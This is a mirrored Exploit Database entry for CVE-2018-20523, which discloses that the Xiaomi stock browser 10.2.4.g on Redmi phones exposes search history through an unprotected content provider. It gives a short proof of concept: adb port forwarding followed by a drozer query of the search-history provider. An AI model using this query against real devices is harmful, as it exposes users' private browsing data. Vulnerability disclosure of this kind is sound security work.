Xiaomi browser 10.2.4.g – Browser Search History Disclosure

• Exploit Database
• 122 阅读

• 作者： Vishwaraj Bhattrai
  日期： 2021-08-10
• 类别：

  • local
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/50188/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

  # Exploit Title: Xiaomi browser 10.2.4.g - Browser Search History Disclosure # Date: 27-Dec-2018 # Exploit Author: Vishwaraj101 # Vendor Homepage: https://www.mi.com/us # Software Link: https://www.apkmirror.com/apk/xiaomi-inc/mi-browse/mi-browse-10-2-4-release/ # Version: 10.2.4.g # Tested on: Tested in Android Version: 8.1.0 # CVE : CVE-2018-20523   *summary: * Xiaomi Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones were vulnerable to content provider injection using which any 3rd party application can read the user’s browser history.   *Vulnerable component:* com.android.browser.searchhistory   *Poc:*   adb forward tcp:31415 tcp:31415   drozer console connect   drozer > run app.provider.query content://com.android.browser.searchhistory/searchhistory   *Blogpost:*   <blockquote class="wp-embedded-content" data-secret="T0OnOSXwGV"><a href="https://vishwarajbhattrai.wordpress.com/2019/03/22/content-provider-injection-in-xiaomi-stock-browser/" target="_blank"rel="external nofollow" class="external" >Content provider injection in Xiaomi stock browser</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Content provider injection in Xiaomi stock browser” — Vishwaraj Bhattrai" src="https://vishwarajbhattrai.wordpress.com/2019/03/22/content-provider-injection-in-xiaomi-stock-browser/embed/#?secret=oyYtL1O0Vm#?secret=T0OnOSXwGV" data-secret="T0OnOSXwGV" frameborder="0" marginmarginscrolling="no"></iframe>